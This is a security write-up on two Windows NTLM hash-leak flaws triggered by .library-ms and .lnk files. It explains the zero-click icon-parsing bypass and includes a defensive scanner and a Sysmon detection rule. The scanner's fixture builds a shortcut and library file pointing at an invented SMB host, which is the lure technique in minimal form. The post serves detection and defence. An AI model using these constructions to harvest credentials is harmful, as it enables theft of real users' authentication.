0‑Click NTLM Credential Leak: When a Patched Windows Flaw Came Back More Dangerous

In March 2025, Microsoft addressed CVE‑2025‑24054, an NTLM hash disclosure triggered by .library‑ms files. In August 2025, researchers disclosed a zero‑click bypass, CVE‑2025‑50154, that leaks the same credential material through .lnk icon parsing on systems that already carry the March fix.

Overview

CVE‑2025‑24054 abused Windows Explorer's handling of .library‑ms files to coerce SMB authentication to attacker‑controlled servers, exposing NTLMv2 challenge‑responses (the "hashes" of the usual shorthand). The patch closed several remote‑path abuse vectors, but it did not neutralize the broader class of issues tied to automatic resource resolution inside Explorer. In August 2025, CVE‑2025‑50154 showed that carefully crafted .lnk shortcuts can still trigger remote fetches and NTLM authentication without any user interaction. The net effect is a reliable credential‑leak primitive with almost no behavioral indicators at the point of initial compromise.

How it works

The original vector relies on the XML definition inside a .library‑ms file, which lists the locations a library aggregates. When a user opens, previews, or in some cases merely interacts with an archive containing such a file, Explorer attempts to enumerate those library locations. If a location's <url> element names a UNC path such as \\server\share, Windows opens an SMB connection to that host and, when the server asks for it, authenticates with NTLM, handing the attacker a challenge‑response it can crack offline or relay. Adversaries distributed booby‑trapped archives via malspam and legitimate file‑sharing services, mixing in .url, .website, and .lnk files to improve reliability across environments.

The bypass pivots to .lnk icon extraction. The shortcut's target points to an executable on a remote SMB share, while its icon location names a local file (for example, shell32.dll), so the patched checks, which look for UNC paths in the icon field, see nothing suspicious. Explorer nevertheless fetches the remote executable in the background to read its embedded RT_ICON resources for rendering, and that SMB connection carries NTLM authentication to the attacker's server. The crucial detail is that this happens while Explorer renders directory contents: opening a folder that contains the malicious shortcut is enough to transmit the challenge‑response. A consequence for defenders is that any inspection rule keyed only on the icon path misses this variant; the target and LinkInfo fields of the shortcut have to be examined as well.
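A hunting helper covering both file types just described, added here as an example and not code from Microsoft or from the researchers who reported either CVE: it parses the public MS‑SHLLINK layout of a .lnk file and the Library Description XML of a .library‑ms, and reports every reference to a UNC host that is not on an allowlist. Because the bypass leaves the icon field local and moves the remote path into the target, the scanner reads all path‑bearing fields (LinkInfo target, relative path, icon, environment blocks) rather than only the icon. The sample files are constructed inline so the script runs offline: the host 10.0.0.5, the share and the file names are invented, and build_lnk exists only to produce that fixture, writing the minimum of the format a parser needs.

```python
import struct
import xml.etree.ElementTree as ET

# ShellLink header constants from the public MS-SHLLINK spec: size 0x4C, CLSID 00021401-0000-0000-C000-000000000046
LNK_HEADER_SIZE = 0x4C
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
HAS_LINK_TARGET_IDLIST, HAS_LINK_INFO, HAS_NAME, HAS_RELATIVE_PATH = 1 << 0, 1 << 1, 1 << 2, 1 << 3
HAS_WORKING_DIR, HAS_ARGUMENTS, HAS_ICON_LOCATION, IS_UNICODE = 1 << 4, 1 << 5, 1 << 6, 1 << 7
ENV_BLOCK, ICON_ENV_BLOCK = 0xA0000001, 0xA0000007  # EnvironmentVariable / IconEnvironment ExtraData blocks
LIBRARY_NS = "{http://schemas.microsoft.com/windows/2009/library}"  # Library Description schema namespace


def _cstr(buf, off):
    """Read a NUL-terminated single-byte string starting at buf[off]."""
    return buf[off:buf.index(b"\x00", off)].decode("cp1252", "replace")


def parse_lnk(data):
    """Return every path-like field a shortcut carries: target, relative path, icon, environment blocks."""
    if len(data) < LNK_HEADER_SIZE or data[4:20] != LNK_CLSID or struct.unpack_from("<I", data)[0] != LNK_HEADER_SIZE:
        raise ValueError("not a ShellLink file")
    flags = struct.unpack_from("<I", data, 20)[0]
    pos, fields = LNK_HEADER_SIZE, {}
    if flags & HAS_LINK_TARGET_IDLIST:  # skip the IDList; its 2-byte size prefix says how far
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:
        li_size, _, li_flags, _, local_off, cnrl_off, suffix_off = struct.unpack_from("<7I", data, pos)
        suffix = _cstr(data, pos + suffix_off) if li_flags & 0x3 else ""
        if li_flags & 0x1:  # VolumeIDAndLocalBasePath: a local target
            fields["target"] = _cstr(data, pos + local_off) + suffix
        if li_flags & 0x2:  # CommonNetworkRelativeLinkAndPathSuffix: a UNC target; NetName sits at its own offset
            net_off = struct.unpack_from("<I", data, pos + cnrl_off + 8)[0]
            fields["target"] = _cstr(data, pos + cnrl_off + net_off) + ("\\" + suffix if suffix else "")
        pos += li_size
    for bit, key in ((HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"), (HAS_WORKING_DIR, "working_dir"),
                     (HAS_ARGUMENTS, "arguments"), (HAS_ICON_LOCATION, "icon")):
        if flags & bit:  # StringData: CountCharacters, then that many UTF-16LE or ANSI characters
            count, width = struct.unpack_from("<H", data, pos)[0], (2 if flags & IS_UNICODE else 1)
            pos += 2
            fields[key] = data[pos:pos + count * width].decode("utf-16-le" if width == 2 else "cp1252")
            pos += count * width
    while pos + 8 <= len(data):  # ExtraData blocks run until a terminal block whose size is < 4
        size, sig = struct.unpack_from("<II", data, pos)
        if size < 4:
            break
        if sig in (ENV_BLOCK, ICON_ENV_BLOCK):  # both carry a NUL-terminated ANSI path right after the signature
            fields["env_icon" if sig == ICON_ENV_BLOCK else "env_target"] = _cstr(data, pos + 8)
        pos += size
    return fields


def library_ms_locations(xml_bytes):
    """Return the <url> text of every simpleLocation in a Library Description (.library-ms) file."""
    return [u.text.strip() for u in ET.fromstring(xml_bytes).iter(LIBRARY_NS + "url") if u.text]


def unc_references(values, allowed_prefixes=()):
    """Keep the values naming a UNC host outside the allowlist (case-insensitive prefix match)."""
    hits = []
    for value in values:
        v = value.strip().replace("/", "\\")
        if v.startswith("\\\\") and not any(v.lower().startswith(p.lower()) for p in allowed_prefixes):
            hits.append(v)
    return hits


def scan(files, allowed_prefixes=()):
    """files: {name: bytes}. Returns {name: [offending UNC references]} for .lnk and .library-ms inputs."""
    report = {}
    for name, data in files.items():
        lower = name.lower()
        values = (parse_lnk(data).values() if lower.endswith(".lnk")
                  else library_ms_locations(data) if lower.endswith(".library-ms") else [])
        hits = unc_references(values, allowed_prefixes)
        if hits:
            report[name] = hits
    return report


def build_lnk(target_unc, icon_location):
    """Fixture builder for this example only: a minimal shortcut whose LinkInfo names a UNC target."""
    server_share, _, leaf = target_unc.rpartition("\\")
    net_name, suffix = server_share.encode("cp1252") + b"\x00", leaf.encode("cp1252") + b"\x00"
    cnrl = struct.pack("<5I", 0x14 + len(net_name), 0x2, 0x14, 0, 0x00020000) + net_name  # ValidNetType, LANMAN
    link_info = struct.pack("<7I", 0x1C + len(cnrl) + len(suffix), 0x1C, 0x2, 0, 0, 0x1C, 0x1C + len(cnrl))
    header = struct.pack("<I16sIIQQQIIIHHII", LNK_HEADER_SIZE, LNK_CLSID,
                         HAS_LINK_INFO | HAS_ICON_LOCATION | IS_UNICODE, 0x20, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0)
    icon = struct.pack("<H", len(icon_location)) + icon_location.encode("utf-16-le")
    return header + link_info + cnrl + suffix + icon + struct.pack("<I", 0)  # trailing TerminalBlock


# Constructed samples for this example: the host 10.0.0.5, the share and the file names are made up.
SAMPLE_FILES = {
    "brief.pdf.lnk": build_lnk("\\\\10.0.0.5\\share\\tool.exe", "%SystemRoot%\\system32\\shell32.dll"),
    "Documents.library-ms": (
        b'<?xml version="1.0" encoding="UTF-8"?>\n'
        b'<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">\n'
        b"  <searchConnectorDescriptionList><searchConnectorDescription>\n"
        b"    <simpleLocation><url>\\\\10.0.0.5\\share</url></simpleLocation>\n"
        b"  </searchConnectorDescription></searchConnectorDescriptionList>\n</libraryDescription>\n"
    ),
}

if __name__ == "__main__":
    print(scan(SAMPLE_FILES, allowed_prefixes=("\\\\fileserver.corp.example\\",)))
```

Run it over an extracted archive or a user's Downloads folder by reading each file into the files mapping. The parser only reads bytes and never resolves or opens the target, so scanning a malicious shortcut does not itself trigger the outbound SMB connection that Explorer would.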

Risks

Captured NTLMv2 responses enable offline cracking; weak, reused, or non‑random passwords are recoverable at practical cost. Note what is captured: a Net‑NTLMv2 challenge‑response bound to the server's challenge, not the NT hash itself, so it cannot be passed or replayed later, and relay has to happen while the victim is authenticating. Under that constraint, adversaries can relay the authentication to internal services that still accept NTLM and do not require signing or channel binding, allowing lateral movement without plaintext credentials; a capture server on the internet can only relay to NTLM endpoints reachable from there, whereas a foothold inside the network can reach far more. The bypass adds a stealth delivery angle: the executable fetched during icon parsing can remain dormant and later be activated by a secondary technique, creating a two‑stage intrusion that sidesteps many delivery‑time controls and user‑awareness safeguards.

Real‑life example

A defense contractor receives a ZIP archive with project resources and several disguised .lnk files. The analyst does not open any file but browses the folder to triage contents. Explorer renders shortcut icons, reaches out to a remote SMB share controlled by the adversary, and sends NTLMv2 hashes. Hours later, a cracked, reused password grants VPN or SharePoint access. Meanwhile, the background icon parse has already placed a harmless‑looking binary on the endpoint. A follow‑up lure, macro, or persistence mechanism invokes it, providing an encrypted reverse shell. The initial steps blend into normal Explorer behavior, so endpoint controls may not flag the sequence until post‑compromise activity becomes visible.

Recommendations

Apply Microsoft's March 2025 update for CVE‑2025‑24054 and track the release that fully addresses CVE‑2025‑50154. Disable NTLM where possible; the policy "Network security: Restrict NTLM: Outgoing NTLM traffic to remote servers" can be run in audit mode first to find what still depends on it. Otherwise enforce NTLMv2 only (LmCompatibilityLevel 5), require SMB signing, and turn on Extended Protection for Authentication on services that must keep accepting NTLM so that relayed sessions fail. Block outbound SMB to the internet at the perimeter and in the host firewall (TCP 445, NetBIOS session service TCP 139 and name/datagram services UDP 137–138). Introduce allowlists for internal SMB destinations and monitor for unexpected outbound authentications. Add SIEM detections for SMB connections to untrusted hosts and for unusual shortcut processing in user directories; note that the SMB client runs in the kernel, so Sysmon Event ID 3 and firewall logs attribute the connection to the System process rather than explorer.exe, which means the rule has to key on destination port and destination trust and then correlate with .lnk or .library‑ms files recently written under user profiles. Block or quarantine .library‑ms and untrusted .lnk files arriving by email or web download, and prefer sandboxed extraction paths. Periodically hunt for suspicious shortcuts and unexplained executables sourced from UNC paths, inspecting the shortcut's target and LinkInfo fields and not only its icon path, because the bypass keeps the icon local. User training remains helpful, but zero‑click vectors demand protocol hardening and traffic controls.
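The SIEM detection recommended above expressed as logic over Sysmon records, added as an example for this post and not a vendor's or the original author's rule. Input is constructed Sysmon Event ID 11 (FileCreate) and Event ID 3 (NetworkConnect) records in the JSON shape a forwarder emits; the field names are Sysmon's, while the hosts, user and paths are invented. The rule flags outbound SMB to non‑internal destinations regardless of process, because the SMB redirector opens the TCP connection from the kernel and the event shows System as the image, and it raises the severity when a shortcut‑like file was written under a user profile shortly before.

```python
import ipaddress
import json
from datetime import datetime, timedelta

SMB_PORTS = {445, 139}
SHORTCUT_SUFFIXES = (".lnk", ".library-ms", ".url", ".website")
CORRELATION_WINDOW = timedelta(seconds=60)  # assumption: tune per environment
# Ranges treated as internal; a deployment adds its corporate ranges here. ipaddress.is_private is
# deliberately not used because Python counts the TEST-NET documentation ranges as private.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8", "169.254.0.0/16")]

# Constructed Sysmon records (Event ID 11 FileCreate, Event ID 3 NetworkConnect) as a JSON forwarder
# would emit them. Field names are Sysmon's; hosts, user and paths are invented for this example.
SAMPLE_EVENTS = "\n".join(json.dumps(e) for e in [
    {"EventID": 11, "UtcTime": "2025-08-20 09:14:00.004", "Image": "C:\\Program Files\\7-Zip\\7zFM.exe",
     "TargetFilename": "C:\\Users\\alice\\Downloads\\project\\brief.pdf.lnk"},
    {"EventID": 3, "UtcTime": "2025-08-20 09:14:02.117", "Image": "System", "Initiated": "true",
     "SourceIp": "10.20.30.41", "DestinationIp": "203.0.113.10", "DestinationPort": 445},
    {"EventID": 3, "UtcTime": "2025-08-20 09:14:03.502", "Image": "System", "Initiated": "true",
     "SourceIp": "10.20.30.41", "DestinationIp": "10.20.1.5", "DestinationPort": 445},
    {"EventID": 3, "UtcTime": "2025-08-20 09:14:05.009", "Initiated": "true", "SourceIp": "10.20.30.41",
     "Image": "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe",
     "DestinationIp": "203.0.113.10", "DestinationPort": 443},
    {"EventID": 3, "UtcTime": "2025-08-20 09:14:06.330", "Image": "System", "Initiated": "false",
     "SourceIp": "10.20.30.41", "DestinationIp": "198.51.100.7", "DestinationPort": 445},
])


def is_internal(ip):
    """True when the address falls in one of the INTERNAL_NETS ranges."""
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in INTERNAL_NETS)


def _ts(ev):
    return datetime.strptime(ev["UtcTime"], "%Y-%m-%d %H:%M:%S.%f")


def detect_smb_egress(jsonl):
    """Alert on outbound SMB to non-internal hosts and attach any shortcut-like file dropped under
    C:\\Users within CORRELATION_WINDOW before it. Event 3 shows 'System' for SMB client traffic
    because the redirector runs in the kernel, so the file-drop correlation supplies the link to Explorer."""
    events = sorted((json.loads(l) for l in jsonl.splitlines() if l.strip()), key=_ts)
    recent_drops, alerts = [], []
    for ev in events:
        if ev.get("EventID") == 11:
            path = ev.get("TargetFilename", "")
            if path.lower().startswith("c:\\users\\") and path.lower().endswith(SHORTCUT_SUFFIXES):
                recent_drops.append((_ts(ev), path))
            continue
        if ev.get("EventID") != 3 or str(ev.get("Initiated", "")).lower() != "true":
            continue  # only connections this host opened
        if int(ev.get("DestinationPort", 0)) not in SMB_PORTS or is_internal(ev["DestinationIp"]):
            continue
        now = _ts(ev)
        drops = [p for t, p in recent_drops if timedelta(0) <= now - t <= CORRELATION_WINDOW]
        alerts.append({"time": ev["UtcTime"], "image": ev.get("Image"),
                       "dest": f"{ev['DestinationIp']}:{ev['DestinationPort']}",
                       "severity": "high" if drops else "medium", "recent_shortcut_drops": drops})
    return alerts


if __name__ == "__main__":
    for alert in detect_smb_egress(SAMPLE_EVENTS):
        print(alert)
```

In a SIEM the same two clauses become a join on hostname within the sixty‑second window; the internal range list is where a deployment adds its own allowlist, and the window, the suffix list and the port set are assumptions to tune.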